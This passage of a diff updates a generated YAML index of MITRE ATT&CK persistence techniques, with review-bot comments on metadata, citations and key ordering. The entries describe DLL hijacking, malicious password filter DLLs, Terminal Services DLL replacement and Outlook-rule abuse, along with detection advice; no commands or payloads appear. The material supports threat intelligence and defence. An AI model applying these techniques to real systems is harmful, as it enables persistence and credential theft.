- - 'Application Log: Application Log Content'
- - 'Windows Registry: Windows Registry Key Modification'
- - 'File: File Modification'
- - 'Module: Module Load'
- - 'Process: Process Creation'
- - 'Windows Registry: Windows Registry Key Creation'
- - 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1137
atomic_tests: []
T1098.003:
technique:
- modified: '2024-03-29T18:29:06.873Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Account Manipulation: Additional Cloud Roles'
description: "An adversary may add additional roles or permissions to an adversary-controlled
cloud account to maintain persistent access to a tenant. For example, adversaries
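Review bot: `x_mitre_permissions_required` (`User`, `Administrator`) is removed from T1137 with nothing replacing it, whereas T1053.003 earlier in this diff keeps its `- User` entry. Anything that filters or groups atomics by required permissions will no longer see T1137; call this out explicitly rather than leaving it inside a 150-line reorder hunk, and note that the same hunk also renames the platform `Office 365` to `Office Suite` and bumps `x_mitre_version` from '1.3' to '1.4'.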
@@ -31926,6 +32301,7 @@ persistence:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Threat Intelligence Center (MSTIC)
- Alex Parsons, Crowdstrike
@@ -31936,6 +32312,7 @@ persistence:
- Praetorian
- Alex Soler, AttackIQ
- Arad Inbar, Fidelis Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: 'Collect activity logs from IAM services and cloud administrator
accounts to identify unusual activity in the assignment of roles to those
@@ -31944,13 +32321,13 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Office 365
- IaaS
- SaaS
- - Google Workspace
- - Azure AD
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'User Account: User Account Modification'
type: attack-pattern
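Review bot: the platform list for T1098.003 drops `Office 365`, `Google Workspace` and `Azure AD` in favour of `Office Suite` and `Identity Provider`, which matches the ATT&CK v16 platform consolidation and the `x_mitre_version` bump to '2.5'. Any per-platform index files keyed on the old platform names need to be regenerated in the same change, otherwise they will still list this technique under platforms it no longer declares.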
@@ -31992,9 +32369,6 @@ persistence:
url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.003
atomic_tests: []
T1547.012:
@@ -32062,19 +32436,18 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.012
atomic_tests: []
T1574.001:
technique:
- modified: '2024-04-18T22:54:54.668Z'
+ modified: '2024-09-30T17:32:59.948Z'
name: 'Hijack Execution Flow: DLL Search Order Hijacking'
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
- Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
+ Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
@@ -32090,8 +32463,8 @@ persistence:
- Travis Smith, Tripwire
- Stefan Kanthak
- Marina Liang
- - Will Alexander
- - Ami Holeston
+ - Ami Holeston, CrowdStrike
+ - Will Alexander, CrowdStrike
x_mitre_deprecated: false
x_mitre_detection: Monitor file systems for moving, renaming, replacing, or
modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared
@@ -32105,7 +32478,7 @@ persistence:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'File: File Modification'
- 'Module: Module Load'
@@ -32131,6 +32504,10 @@ persistence:
description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November
17, 2020.
url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
+ - source_name: Hexacorn DLL Hijacking
+ description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5.
+ Retrieved August 14, 2024.
+ url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
- source_name: Microsoft Security Advisory 2269637
description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved
March 13, 2020.
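Review bot: the new `Hexacorn DLL Hijacking` reference is correctly paired with the `(Citation: Hexacorn DLL Hijacking)` added to the T1574.001 description in the earlier hunk, so the citation resolves. The adjacent context entry `Microsoft Security Advisory 2269637` has an empty year field, `(, May 23)`; that is pre-existing upstream data rather than something this change introduces, but if the generator ever normalises citation strings it is one to fix.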
@@ -32158,42 +32535,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1574.001
atomic_tests: []
T1137.006:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--34f1d81d-fe88-4f97-bd3b-a3164536255d
- type: attack-pattern
- created: '2019-11-07T19:52:52.801Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1137.006
- url: https://attack.mitre.org/techniques/T1137/006
- - url: https://support.office.com/article/Add-or-remove-add-ins-0af570c4-5cf3-4fa9-9b88-403625a0b460
- description: Microsoft. (n.d.). Add or remove add-ins. Retrieved July 3, 2017.
- source_name: Microsoft Office Add-ins
- - url: https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/
- description: Knowles, W. (2017, April 21). Add-In Opportunities for Office
- Persistence. Retrieved July 3, 2017.
- source_name: MRWLabs Office Persistence Add-ins
- - source_name: FireEye Mail CDS 2018
- url: https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s03-youve-got-mail.pdf
- description: Caban, D. and Hirani, M. (2018, October 3). You’ve Got Mail!
- Enterprise Email Compromise. Retrieved April 22, 2019.
- - source_name: GlobalDotName Jun 2019
- url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
- description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
- - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T15:37:09.190Z'
name: 'Office Application Startup: Add-ins'
description: "Adversaries may abuse Microsoft Office add-ins to obtain persistence
on a compromised system. Office add-ins can be used to add functionality to
@@ -32208,13 +32554,18 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor and validate the Office trusted locations on the file system and audit the Registry entries relevant for enabling add-ins.(Citation: GlobalDotName Jun 2019)(Citation: MRWLabs Office Persistence Add-ins)
Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Modification'
- 'File: File Modification'
@@ -32222,11 +32573,34 @@ persistence:
- 'Windows Registry: Windows Registry Key Creation'
- 'Process: Process Creation'
- 'File: File Creation'
- x_mitre_permissions_required:
- - Administrator
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--34f1d81d-fe88-4f97-bd3b-a3164536255d
+ created: '2019-11-07T19:52:52.801Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1137/006
+ external_id: T1137.006
+ - source_name: FireEye Mail CDS 2018
+ description: Caban, D. and Hirani, M. (2018, October 3). You’ve Got Mail!
+ Enterprise Email Compromise. Retrieved April 22, 2019.
+ url: https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s03-youve-got-mail.pdf
+ - source_name: MRWLabs Office Persistence Add-ins
+ description: Knowles, W. (2017, April 21). Add-In Opportunities for Office
+ Persistence. Retrieved July 3, 2017.
+ url: https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/
+ - source_name: Microsoft Office Add-ins
+ description: Microsoft. (n.d.). Add or remove add-ins. Retrieved July 3, 2017.
+ url: https://support.office.com/article/Add-or-remove-add-ins-0af570c4-5cf3-4fa9-9b88-403625a0b460
+ - source_name: GlobalDotName Jun 2019
+ description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
+ - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
+ url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1137.006
atomic_tests: []
T1505.002:
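Review bot: T1137.006 also loses `x_mitre_permissions_required` (`Administrator`, `User`), and the same removal appears for T1137 above and for T1556.002 later in this diff (`Administrator`, `SYSTEM`). Taken together this is a consistent format change, so one sentence in the PR description saying the field is no longer exported would save reviewers from checking each technique individually.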
@@ -32257,7 +32631,7 @@ persistence:
url: https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf
description: 'Faou, M. (2019, May). Turla LightNeuron: One email away from
remote code execution. Retrieved June 24, 2019.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T17:05:44.321Z'
name: 'Server Software Component: Transport Agent'
description: "Adversaries may abuse Microsoft transport agents to establish
persistent access to systems. Microsoft Exchange transport agents can operate
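Review bot: `modified` for T1505.002 goes backwards, from `2022-04-25T14:00:00.188Z` to `2021-10-18T17:05:44.321Z`, the same pattern as T1542.005 earlier in this diff. Two regressions in one regeneration point at the source data rather than a one-off; verify which STIX bundle the generator consumed for these objects.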
@@ -32295,13 +32669,11 @@ persistence:
- SYSTEM
- Administrator
- root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1505.002
atomic_tests: []
T1574.014:
technique:
- modified: '2024-04-18T15:03:32.158Z'
+ modified: '2024-04-28T15:44:25.342Z'
name: AppDomainManager
description: "Adversaries may execute their own malicious payloads by hijacking
how the .NET `AppDomainManager` loads assemblies. The .NET framework uses
@@ -32327,7 +32699,7 @@ persistence:
phase_name: defense-evasion
x_mitre_contributors:
- Thomas B
- - Ivy Bostock
+ - Ivy Drexel
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -32369,7 +32741,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1098.006:
technique:
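Review bot: T1574.014 (and T1098.006 in the next hunk) has no `identifier:` line before `atomic_tests: []`, unlike T1547.012, T1574.001 and the other techniques here, which all carry `identifier: <id>` immediately before `atomic_tests`. Since T1547.012 also has an empty `atomic_tests` list and still gets an `identifier`, the omission does not look like a rule for techniques without tests; check whether the generator is skipping the key for these two entries.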
@@ -32447,11 +32818,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1053:
technique:
- modified: '2024-03-01T15:29:46.832Z'
+ modified: '2024-10-15T15:14:03.453Z'
name: Scheduled Task/Job
description: |-
Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
@@ -32531,35 +32901,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1556.002:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Vincent Le Toux
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
- type: attack-pattern
- created: '2020-02-11T19:05:45.829Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.002
- url: https://attack.mitre.org/techniques/T1556/002
- - url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
- description: Fuller, R. (2013, September 11). Stealing passwords every time
- they change. Retrieved November 21, 2017.
- source_name: Carnal Ownage Password Filters Sept 2013
- - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
- description: Bialek, J. (2013, September 15). Intercepting Password Changes
- With Function Hooking. Retrieved November 21, 2017.
- source_name: Clymb3r Function Hook Passwords Sept 2013
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-21T16:16:18.271Z'
name: 'Modify Authentication Process: Password Filter DLL'
description: "Adversaries may register malicious password filter dynamic link
libraries (DLLs) into the authentication process to acquire user credentials
@@ -32583,71 +32928,60 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Vincent Le Toux
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages
) and correlate then investigate the DLL files these files reference.
Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Modification'
- 'File: File Creation'
- 'Module: Module Load'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
+ created: '2020-02-11T19:05:45.829Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/002
+ external_id: T1556.002
+ - source_name: Clymb3r Function Hook Passwords Sept 2013
+ description: Bialek, J. (2013, September 15). Intercepting Password Changes
+ With Function Hooking. Retrieved November 21, 2017.
+ url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
+ - source_name: Carnal Ownage Password Filters Sept 2013
+ description: Fuller, R. (2013, September 11). Stealing passwords every time
+ they change. Retrieved November 21, 2017.
+ url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1556.002
atomic_tests: []
T1505.005:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--379809f6-2fac-42c1-bd2e-e9dee70b27f8
- created: '2022-03-28T15:34:44.590Z'
- x_mitre_version: '1.0'
- external_references:
- - source_name: mitre-attack
- external_id: T1505.005
- url: https://attack.mitre.org/techniques/T1505/005
- - source_name: James TermServ DLL
- url: https://twitter.com/james_inthe_box/status/1150495335812177920
- description: James. (2019, July 14). @James_inthe_box. Retrieved March 28,
- 2022.
- - source_name: Microsoft System Services Fundamentals
- url: https://social.technet.microsoft.com/wiki/contents/articles/12229.windows-system-services-fundamentals.aspx
- description: Microsoft. (2018, February 17). Windows System Services Fundamentals.
- Retrieved March 28, 2022.
- - source_name: Microsoft Remote Desktop Services
- url: https://docs.microsoft.com/windows/win32/termserv/about-terminal-services
- description: Microsoft. (2019, August 23). About Remote Desktop Services.
- Retrieved March 28, 2022.
- - source_name: RDPWrap Github
- url: https://github.com/stascorp/rdpwrap
- description: Stas'M Corp. (2014, October 22). RDP Wrapper Library by Stas'M.
- Retrieved March 28, 2022.
- - source_name: Windows OS Hub RDP
- url: http://woshub.com/how-to-allow-multiple-rdp-sessions-in-windows-10/
- description: Windows OS Hub. (2021, November 10). How to Allow Multiple RDP
- Sessions in Windows 10 and 11?. Retrieved March 28, 2022.
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-09-12T19:40:42.810Z'
+ name: 'Server Software Component: Terminal Services DLL'
description: |-
Adversaries may abuse components of Terminal Services to enable persistent access to systems. Microsoft Terminal Services, renamed to Remote Desktop Services in some Windows Server OSs as of 2022, enable remote terminal connections to hosts. Terminal Services allows servers to transmit a full, interactive, graphical user interface to clients via RDP.(Citation: Microsoft Remote Desktop Services)
[Windows Service](https://attack.mitre.org/techniques/T1543/003)s that are run as a "generic" process (ex: svchost.exe
) load the service's DLL file, the location of which is stored in a Registry entry named ServiceDll
.(Citation: Microsoft System Services Fundamentals) The termsrv.dll
file, typically stored in `%SystemRoot%\System32\`, is the default ServiceDll
value for Terminal Services in `HKLM\System\CurrentControlSet\services\TermService\Parameters\`.
Adversaries may modify and/or replace the Terminal Services DLL to enable persistent access to victimized hosts.(Citation: James TermServ DLL) Modifications to this DLL could be done to execute arbitrary payloads (while also potentially preserving normal termsrv.dll
functionality) as well as to simply enable abusable features of Terminal Services. For example, an adversary may enable features such as concurrent [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) sessions by either patching the termsrv.dll
file or modifying the ServiceDll
value to point to a DLL that provides increased RDP functionality.(Citation: Windows OS Hub RDP)(Citation: RDPWrap Github) On a non-server Windows OS this increased functionality may also enable an adversary to avoid Terminal Services prompts that warn/log out users of a system when a new RDP session is created.
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: 'Server Software Component: Terminal Services DLL'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for changes to Registry keys associated with ServiceDll
and other subkey values under HKLM\System\CurrentControlSet\services\TermService\Parameters\
.
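Review bot: key reordering hides the one substantive edit in this hunk, the `modified` bump to `2024-09-12T19:40:42.810Z` on the Terminal Services DLL entry, under lines such as `x_mitre_deprecated: false` and `revoked: false` that are removed here only to be re-added lower in the same object. If this index is regenerated from the upstream STIX data, have the generator emit keys in a fixed order (the order ATT&CK itself uses, or sorted) so that future regenerations diff only on real changes.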
@@ -32656,24 +32990,56 @@ persistence:
Monitor commands as well as processes and arguments for potential adversary actions to modify Registry values (ex: reg.exe
) or modify/replace the legitimate termsrv.dll
.
Monitor module loads by the Terminal Services process (ex: svchost.exe -k termsvcs
) for unexpected DLLs (the default is %SystemRoot%\System32\termsrv.dll
, though an adversary could also use [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005) on a malicious payload).
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.0'
x_mitre_data_sources:
- 'Module: Module Load'
- 'Command: Command Execution'
- 'File: File Modification'
- 'Windows Registry: Windows Registry Key Modification'
- 'Process: Process Creation'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--379809f6-2fac-42c1-bd2e-e9dee70b27f8
+ created: '2022-03-28T15:34:44.590Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1505/005
+ external_id: T1505.005
+ - source_name: James TermServ DLL
+ description: James. (2019, July 14). @James_inthe_box. Retrieved September
+ 12, 2024.
+ url: https://x.com/james_inthe_box/status/1150495335812177920
+ - source_name: Microsoft System Services Fundamentals
+ description: Microsoft. (2018, February 17). Windows System Services Fundamentals.
+ Retrieved March 28, 2022.
+ url: https://social.technet.microsoft.com/wiki/contents/articles/12229.windows-system-services-fundamentals.aspx
+ - source_name: Microsoft Remote Desktop Services
+ description: Microsoft. (2019, August 23). About Remote Desktop Services.
+ Retrieved March 28, 2022.
+ url: https://docs.microsoft.com/windows/win32/termserv/about-terminal-services
+ - source_name: RDPWrap Github
+ description: Stas'M Corp. (2014, October 22). RDP Wrapper Library by Stas'M.
+ Retrieved March 28, 2022.
+ url: https://github.com/stascorp/rdpwrap
+ - source_name: Windows OS Hub RDP
+ description: Windows OS Hub. (2021, November 10). How to Allow Multiple RDP
+ Sessions in Windows 10 and 11?. Retrieved March 28, 2022.
+ url: http://woshub.com/how-to-allow-multiple-rdp-sessions-in-windows-10/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1505.005
atomic_tests: []
T1176:
technique:
- modified: '2024-04-18T23:22:37.874Z'
+ modified: '2024-09-12T19:48:15.871Z'
name: Browser Extensions
description: "Adversaries may abuse Internet browser extensions to establish
persistent access to victim systems. Browser extensions or plugins are small
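Review bot: `spec_version: '2.1'` is dropped from this object, and from every other object in the patch, while `x_mitre_attack_spec_version` moves from 2.1.0 to 3.2.0; if anything downstream treats these technique blocks as STIX 2.1 objects, `spec_version` is a required property there, so confirm the removal is deliberate (for example the generator now reading a bundle that carries the version at bundle level) rather than a side effect of the source change. Worth a sentence in the commit message either way.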
@@ -32765,8 +33131,8 @@ persistence:
url: https://static.googleusercontent.com/media/research.google.com/en//pubs/archive/43824.pdf
- source_name: Chrome Extension C2 Malware
description: 'Kjaer, M. (2016, July 18). Malware in the browser: how you might
- get hacked by a Chrome extension. Retrieved November 22, 2017.'
- url: https://kjaer.io/extension-malware/
+ get hacked by a Chrome extension. Retrieved September 12, 2024.'
+ url: https://web.archive.org/web/20240608001937/https://kjaer.io/extension-malware/
- source_name: Catch All Chrome Extension
description: Marinho, R. (n.d.). "Catch-All" Google Chrome Malicious Extension
Steals All Posted Data. Retrieved November 16, 2017.
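Review bot: pinning the `Chrome Extension C2 Malware` reference to a web.archive.org snapshot is the right call for a personal blog, but the same treatment is missing for the `James TermServ DLL` reference added in the previous hunk, which now points at a bare x.com status URL; archive that one too, since a deleted post leaves T1505.005 with an uncheckable primary citation.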
@@ -32797,7 +33163,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1176
atomic_tests:
- name: Chrome/Chromium (Developer Mode)
@@ -32869,66 +33234,135 @@ persistence:
name: manual
T1137.005:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-10-15T16:02:26.206Z'
+ name: Outlook Rules
+ description: |-
+ Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
+
+ Once malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
x_mitre_contributors:
- Microsoft Security
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--3d1b9d7e-3921-4d25-845a-7d9f15c0da44
+ x_mitre_deprecated: false
+ x_mitre_detection: |-
+ Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) This PowerShell script is ineffective in gathering rules with modified `PRPR_RULE_MSG_NAME` and `PR_RULE_MSG_PROVIDER` properties caused by adversaries using a Microsoft Exchange Server Messaging API Editor (MAPI Editor), so only examination with the Exchange Administration tool MFCMapi can reveal these mail forwarding rules.(Citation: Pfammatter - Hidden Inbox Rules) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
+
+ Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.2'
+ x_mitre_data_sources:
+ - 'Process: Process Creation'
+ - 'Application Log: Application Log Content'
+ - 'Command: Command Execution'
type: attack-pattern
+ id: attack-pattern--3d1b9d7e-3921-4d25-845a-7d9f15c0da44
created: '2019-11-07T20:00:25.560Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1137.005
url: https://attack.mitre.org/techniques/T1137/005
- - source_name: SilentBreak Outlook Rules
- url: https://silentbreaksecurity.com/malicious-outlook-rules/
- description: Landers, N. (2015, December 4). Malicious Outlook Rules. Retrieved
- February 4, 2019.
+ external_id: T1137.005
+ - source_name: Pfammatter - Hidden Inbox Rules
+ description: Damian Pfammatter. (2018, September 17). Hidden Inbox Rules in
+ Microsoft Exchange. Retrieved October 12, 2021.
+ url: https://blog.compass-security.com/2018/09/hidden-inbox-rules-in-microsoft-exchange/
- source_name: Microsoft Detect Outlook Forms
- url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
4, 2019.
- - source_name: Pfammatter - Hidden Inbox Rules
- url: https://blog.compass-security.com/2018/09/hidden-inbox-rules-in-microsoft-exchange/
- description: Damian Pfammatter. (2018, September 17). Hidden Inbox Rules in
- Microsoft Exchange. Retrieved October 12, 2021.
+ url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
+ - source_name: SilentBreak Outlook Rules
+ description: Landers, N. (2015, December 4). Malicious Outlook Rules. Retrieved
+ February 4, 2019.
+ url: https://silentbreaksecurity.com/malicious-outlook-rules/
- source_name: SensePost NotRuler
